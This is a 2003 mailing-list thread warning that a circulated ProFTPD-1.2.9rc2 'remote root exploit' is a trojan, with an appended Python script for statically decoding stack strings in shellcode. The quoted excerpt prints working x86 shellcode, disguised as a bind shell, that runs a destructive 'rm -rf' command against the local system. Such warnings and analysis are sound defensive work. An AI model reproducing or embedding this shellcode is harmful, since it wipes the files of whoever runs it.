From: a.gietl at e-admin.de (Andreas Gietl)
Subject: ProFTPD-1.2.9rc2 remote root exploit

On Friday 24 October 2003 16:20, Robert Jaroszuk wrote:

yeah, it deletes /bin/* boot/* and few other files.

> On Fri, 24 Oct 2003, Andreas Gietl wrote:
>
> ; On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
> ;
> ; this seems to delete sth on the local harddisk. anybody else seeing this
> ; effect?
>
> Yea, something like that.
>
> /* x86 bind shellcode */
> char sc[]=
> "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
> "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
> "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
> "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
> "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
> "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
> "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
> "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
>
> [ cut ]
>
> /* connect to the bindshell */
> printf("Trying to connect, please wait...\n");
> void(*sleep)()=(void*)sc;sleep(5);
>
> This exploit tries to run shellcode on local machine.
> Probably smth evil in this shellcode:

--
e-admin internet gmbh
Andreas Gietl                tel +49 941 3810884
Ludwig-Thoma-Strasse 35      fax +49 (0)1805/39160 - 29104
93051 Regensburg             mobile +49 171 6070008
PGP/GPG key at http://www.e-admin.de/gpg.html
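
A static way to make the check discussed in this thread before compiling an untrusted PoC, as an added example that is not part of the original messages: it pulls the `\x` escapes out of a C source and models the stack writes of a leading push-and-patch sequence to recover the strings the shellcode assembles, without executing anything. The function names are hypothetical and the sample bytes are constructed (they encode a harmless command), not the bytes quoted above.

```python
import re

# Constructed sample, not the bytes posted in the thread: the same
# push-then-patch stack-string style, encoding a harmless command.
SAMPLE_C = r'''
char sc[]=
"\x31\xc0\x50\x68\x68\x69\x21\x58\x68\x63\x68\x6f\x20\x68\x2d"
"\x63\x58\x65\x68\x2f\x73\x68\x58\x68\x2f\x62\x69\x6e\x88\x44"
"\x24\x07\x88\x44\x24\x0a\x88\x44\x24\x13\x90\x90";
'''

def literal_bytes(c_source):
    """Collect every hex escape found in the C string literals of a source file."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", c_source))

def stack_strings(code):
    """Model stack writes of a leading run of simple 32-bit x86 instructions.

    Understands only: xor eax,eax / push eax / push imm32 /
    mov [esp+disp8],al. Stops at the first other opcode. Nothing is run.
    """
    stack = bytearray()      # index 0 is the byte at esp
    eax_zero = False         # only trust eax/al after an explicit xor
    i = 0
    while i < len(code):
        if code[i:i + 2] == b"\x31\xc0":               # xor eax,eax
            eax_zero = True
            i += 2
        elif code[i] == 0x50 and eax_zero:             # push eax (zero dword)
            stack[:0] = b"\x00" * 4
            i += 1
        elif code[i] == 0x68 and i + 5 <= len(code):   # push imm32
            stack[:0] = code[i + 1:i + 5]
            i += 5
        elif (code[i:i + 3] == b"\x88\x44\x24" and eax_zero
              and i + 4 <= len(code)):                 # mov [esp+disp8],al
            offset = code[i + 3]
            if offset < len(stack):
                stack[offset] = 0                      # placeholder byte -> NUL
            i += 4
        else:
            break                                      # outside this tiny model
    parts = bytes(stack).split(b"\x00")
    return [p.decode("ascii") for p in parts
            if len(p) >= 2 and all(32 <= b < 127 for b in p)]

if __name__ == "__main__":
    print(stack_strings(literal_bytes(SAMPLE_C)))
```

Strings such as a shell path followed by `-c` and a command line in a PoC that claims to be a remote exploit are the signal to stop and read the rest of the source before running it.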